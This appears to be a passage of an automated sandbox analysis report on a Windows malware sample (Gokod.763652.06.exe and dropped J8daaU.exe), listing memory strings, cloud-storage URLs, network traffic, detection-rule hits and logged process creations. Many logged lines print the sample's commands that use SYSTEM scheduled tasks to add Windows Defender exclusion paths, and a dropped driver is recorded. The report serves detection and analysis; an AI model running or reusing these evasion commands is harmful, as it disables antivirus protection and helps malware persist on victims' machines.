Source: J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/v
Source: svchost.exe, 00000001.00000003.1208743106.000001F3856C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.1.dr, qmgr.db.1.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.1.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: Gokod.763652.06.exe, J8daaU.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000002.00000003.1380560951.000002336DE4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000002.00000003.1380560951.000002336DE4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000002.00000003.1379854194.000002336DE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000002.00000002.1395559421.000002336DE2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395625269.000002336DE59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: Gokod.763652.06.exe, aceprocted.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: Gokod.763652.06.exeString found in binary or memory: https://www.hawe.com/de-de/kontakt/kontaktsuche/)
Source: Gokod.763652.06.exe, 00000000.00000003.1318204727.0000000000598000.00000004.00000020.00020000.00000000.sdmp, Gokod.763652.06.exe, 00000000.00000003.1353431063.0000000000598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xh4ffp.oss-cn-beijing.aliyuncs.com/
Source: Gokod.763652.06.exe, 00000000.00000003.1318204727.0000000000598000.00000004.00000020.00020000.00000000.sdmp, Gokod.763652.06.exe, 00000000.00000003.1353431063.0000000000598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xh4ffp.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1002w~
Source: Gokod.763652.06.exe, 00000000.00000003.1318204727.0000000000598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xh4ffp.oss-cn-beijing.aliyuncs.com/7-2476756634-1002
Source: Gokod.763652.06.exe, 00000000.00000003.1353431063.0000000000598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xh4ffp.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/7-2476756634-1002
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 39.103.20.59:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.98:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.98:443 -> 192.168.2.4:49742 version: TLS 1.2

System Summary

barindex
Source: 8.2.J8daaU.exe.1811f7d0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 55.2.J8daaU.exe.2b875810000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: eToken.dll.0.drStatic PE information: section name: .QO
Source: eToken.dll.0.drStatic PE information: section name: .{,3
Source: C:\Users\user\Documents\J8daaU.exeCode function: 8_2_00007FF6FCAE3CA9 NtAllocateVirtualMemory,8_2_00007FF6FCAE3CA9
Source: C:\Users\user\Documents\J8daaU.exeCode function: 55_2_00007FF6FCAE3CA9 NtAllocateVirtualMemory,55_2_00007FF6FCAE3CA9
Source: C:\Users\user\Desktop\Gokod.763652.06.exeFile created: C:\Windows\Temp\aceprocted.sysJump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeCode function: 8_2_00007FF6FCAE81788_2_00007FF6FCAE8178
Source: C:\Users\user\Documents\J8daaU.exeCode function: 8_2_00007FF6FCAE9AE08_2_00007FF6FCAE9AE0
Source: C:\Users\user\Documents\J8daaU.exeCode function: 8_2_00007FF6FCAE190C8_2_00007FF6FCAE190C
Source: C:\Users\user\Documents\J8daaU.exeCode function: 8_2_00007FF6FCAEF9088_2_00007FF6FCAEF908
Source: C:\Users\user\Documents\J8daaU.exeCode function: 55_2_00007FF6FCAE817855_2_00007FF6FCAE8178
Source: C:\Users\user\Documents\J8daaU.exeCode function: 55_2_00007FF6FCAE9AE055_2_00007FF6FCAE9AE0
Source: C:\Users\user\Documents\J8daaU.exeCode function: 55_2_00007FF6FCAE190C55_2_00007FF6FCAE190C
Source: C:\Users\user\Documents\J8daaU.exeCode function: 55_2_00007FF6FCAEF90855_2_00007FF6FCAEF908
Source: C:\Users\user\Documents\J8daaU.exeCode function: 55_2_000002B87364909555_2_000002B873649095
Source: C:\Users\user\Documents\J8daaU.exeCode function: String function: 00007FF6FCAE3A79 appears 40 times
Source: C:\Users\user\Documents\J8daaU.exeCode function: String function: 00007FF6FCAE1660 appears 44 times
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 448 -p 7992 -ip 7992
Source: Gokod.763652.06.exe, 00000000.00000000.1155742408.0000000140054000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameInstallShield SetupSuite.exe< vs Gokod.763652.06.exe
Source: Gokod.763652.06.exeBinary or memory string: OriginalFilenameInstallShield SetupSuite.exe< vs Gokod.763652.06.exe
Source: Gokod.763652.06.exeBinary or memory string: OriginalFilenamelibqb.dll@ vs Gokod.763652.06.exe
Source: Gokod.763652.06.exeBinary or memory string: OriginalFilenameqtvirtualkeyboard_openwnn.dllp( vs Gokod.763652.06.exe
Source: Gokod.763652.06.exeBinary or memory string: OriginalFilenameGoogleChromePortable_116.0.5845.111_online.paf.exe^ vs Gokod.763652.06.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: 8.2.J8daaU.exe.1811f7d0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 55.2.J8daaU.exe.2b875810000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: aceprocted.sys.0.drBinary string: \Device\Driver\
Source: aceprocted.sys.0.drBinary string: \Device\TrueSight
Source: classification engineClassification label: mal100.evad.winEXE@84/35@2/3
Source: C:\Users\user\Documents\J8daaU.exeCode function: 55_2_000002B873644BE5 CreateToolhelp32Snapshot,55_2_000002B873644BE5
Source: C:\Users\user\Documents\J8daaU.exeFile created: C:\Program Files (x86)\4xCNoeJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\i[1].datJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2020:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7992
Source: C:\Users\user\Desktop\Gokod.763652.06.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5212:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7444:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2096:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2896:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5668:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4956:120:WilError_03
Source: C:\Users\user\Documents\J8daaU.exeMutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8152:120:WilError_03
Source: C:\Users\user\Desktop\Gokod.763652.06.exeFile created: C:\Windows\Temp\aceprocted.sysJump to behavior
Source: Gokod.763652.06.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Documents\J8daaU.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Gokod.763652.06.exeVirustotal: Detection: 16%
Source: Gokod.763652.06.exeReversingLabs: Detection: 16%
Source: Gokod.763652.06.exeString found in binary or memory: e_LowerCaseLongPathFF-ADDF
Source: Gokod.763652.06.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\Gokod.763652.06.exeFile read: C:\Users\user\Desktop\Gokod.763652.06.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Gokod.763652.06.exe "C:\Users\user\Desktop\Gokod.763652.06.exe"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknownProcess created: C:\Users\user\Documents\J8daaU.exe C:\Users\user\Documents\J8daaU.exe
Source: unknownProcess created: C:\Users\user\Documents\J8daaU.exe C:\Users\user\Documents\J8daaU.exe
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 448 -p 7992 -ip 7992
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7992 -s 2280
Source: unknownProcess created: C:\Users\user\Documents\J8daaU.exe C:\Users\user\Documents\J8daaU.exe
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
